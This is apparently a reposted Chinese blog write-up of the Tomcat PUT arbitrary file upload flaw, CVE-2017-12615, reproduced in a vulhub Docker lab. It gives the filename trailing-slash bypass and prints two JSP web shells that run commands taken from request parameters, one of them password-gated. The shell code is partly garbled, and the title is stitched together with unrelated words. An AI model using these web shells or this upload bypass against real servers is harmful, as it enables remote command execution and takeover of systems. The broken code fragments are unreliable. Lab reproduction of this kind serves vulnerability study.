dockers log查询dockers的文件_Tomcat PUT方法任意文件上传

漏洞背景：

tomcat(7.0.0-7.8.1)服务器,开启了HTTP PUT请求方法，web.xml文件中的readonly值设置未false

漏洞环境：

使用vulhub环境，直接dockers安装

安装成功：

安装vulhub详见：

https://vulhub.org/#/index/

漏洞利用：

直接抓包进行修改

1、修改为put方法

2、写入shell

测试是否开启PUT方法

写入shell(注意需要在文件名后面加上一个/进行过滤绕过，未加/会报错，如果写入一个txt文件则不用加/且不会报错)

测试结果

shell(linux下使用，我之前用了一个Windows的，执行报错)

"java" import=public static String excuteCmd(String c) {  StringBuilder line = new StringBuilder();  try {    Process pro = Runtime.getRuntime().exec(c);    BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));    String temp = null;    while ((temp = buf.readLine()) != null) {      line.append(temp + "\\n");      }      buf.close();    } catch (Exception e) {      line.append(e.getMessage());    }    return line.toString();} %>    if(

else{out.println(":-)");}%>

shell(windows，未使用过，一个大佬的复现使用的)

    if("123".equals(request.getParameter("pwd"))){        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();        int a = -1;                  byte[] b = new byte[1024];                  out.print("

); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print(" } %>

后续再试着使用其它的shell及工具(CVE-2017-12615漏洞利用工具)进行测试，提高效率

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/528271.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！